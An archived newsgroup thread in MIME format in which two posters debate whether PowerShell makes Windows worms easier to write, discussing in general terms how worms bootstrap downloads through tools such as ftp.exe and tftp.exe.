From: "Rich" 

This is a multi-part message in MIME format.

------=_NextPart_000_02C8_01C74FA1.D1E60470
Content-Type: text/plain;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

   Either way you have to have your worm which would almost always be =
sent as native code to create a new process which could be ftp.exe et = al,
cmd.exe, or powershell.exe.  All the extra level of indirection gets = you
is complexity.  All a dependency on powershell.exe gets you is a = much
smaller number of potential targets.  It's simpler and probably = smaller
to use native code.

Rich
  "Geo."  wrote in message =
news:45d27a83$3{at}w3.nls.net...
  So with Monad it's not like cmd, you have to start up some environment =
not=20
  use the default?

  Geo.

  "Rich"  wrote in message news:45d26fca$1{at}w3.nls.net...
     I understand.  With your example you would be better using native =
code to=20
  call ftp, tftp, or whatever instead of native code to call PowerShell =
and=20
  then have it call ftp, tftp, or whatever.

  Rich
    "Geo."  wrote in message =
news:45d26a23{at}w3.nls.net...
    The way you get in with a worm typically is by executing some simple =
code
    that then downloads the worm executable, sort of like a bootstrap=20
  operation.
    Things like scripting make it easier to do that stage one and get =
the
    download going.

    Granted, not always required as an example sql server worm didn't =
need to
    use this technique, but most do. Certainly the latest NT worms =
including=20
  the
    ones that hit NT4 machines use this technique. They also use other =
handy
    stuff like ftp.exe or tftp.exe. The more capabilities the easier it =
is to
    infect a system.

    That's why the old macs were considered so secure, there just wasn't =
much=20
  to
    work with. It's also why if linux gets much more popular the virus =
problem
    there will be far worse than anything we've seen on windows.

    Geo.

    "Rich"  wrote in message news:45d1e42e$1{at}w3.nls.net...
       That's what I meant by "bypass the user".  Makes no difference.

    Rich

      "Geo."  wrote in message =
news:45d19efa$2{at}w3.nls.net...
      think worms not trojans. no user required.

      Geo.

      "Rich"  wrote in message news:45d131f1$1{at}w3.nls.net...
         Why?  If you can fool or bypass the user to run a program you =
may as
    well
      run a native program.

      Rich


------=_NextPart_000_02C8_01C74FA1.D1E60470
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable








   Either
way you have to =
have your worm=20
which would almost always be sent as native code to create a new process = which=20
could be ftp.exe">ftp://ftp.exe">ftp.exe et al,
cmd.exe, or=20 powershell.exe.  All the extra level of indirection
gets you is=20 complexity.  All a dependency on powershell.exe
gets you is a much = smaller=20
number of potential targets.  It's simpler and probably smaller to = use=20
native code.
 
Rich

  "Geo." <georger{at}nls.net>">mailto:georger{at}nls.net">georger{at}nls.net>
wrote=20
  in message news:45d27a83$3{at}w3.nls.net...So=20
  with Monad it's not like cmd, you have to start up some environment =
not=20
  use the
default?Geo."Rich"
<{at}> wrote in =
message news:45d26fca$1{at}w3.nls.net...=
  =20
  I understand.  With your example you would be better using native =
code to=20
  call ftp, tftp, or whatever instead of native code to call =
PowerShell and=20
  then have it call ftp, tftp, or
whatever.Rich  =
"Geo."=20
  <georger{at}nls.net>">mailto:georger{at}nls.net">georger{at}nls.net>
wrote =
in message=20
  news:45d26a23{at}w3.nls.net...&nbs=
p;=20
  The way you get in with a worm typically is by executing some simple=20
  code  that then downloads the worm executable, sort of like a =

  bootstrap operation.  Things like scripting make it =
easier to do=20
  that stage one and get the  download
going.  =
Granted,=20
  not always required as an example sql server worm didn't need =
to  use=20
  this technique, but most do. Certainly the latest NT worms including=20
  the  ones that hit NT4 machines use this
technique. They =
also use=20
  other handy  stuff like ftp.exe;">ftp://ftp.exe">ftp.exe; =
or=20
  tftp.exe. The more capabilities the easier it is to  infect a =

  system.  That's why the old macs were considered so =
secure, there=20
  just wasn't much to  work with. It's also
why if linux =
gets much=20
  more popular the virus problem  there will be far worse than =
anything=20
  we've seen on windows. 
Geo.  "Rich" =
<{at}> wrote=20
  in message news:45d1e42e$1{at}w3.nls.net...=
    =20
  That's what I meant by "bypass the user".  Makes no=20
  difference. 
Rich    "Geo."
<georger{at}nls.net>">mailto:georger{at}nls.net">georger{at}nls.net>
wrote in =
message news:45d19efa$2{at}w3.nls.net...=
   =20
  think worms not trojans. no user
required.   =20
  Geo.    "Rich"
<{at}> wrote in message news:45d131f1$1{at}w3.nls.net...=
      =20
  Why?  If you can fool or bypass the user to run a program you may =

  as  well    run a native=20
  program.    =
Rich

------=_NextPart_000_02C8_01C74FA1.D1E60470--

--- BBBS/NT v4.01 Flag-5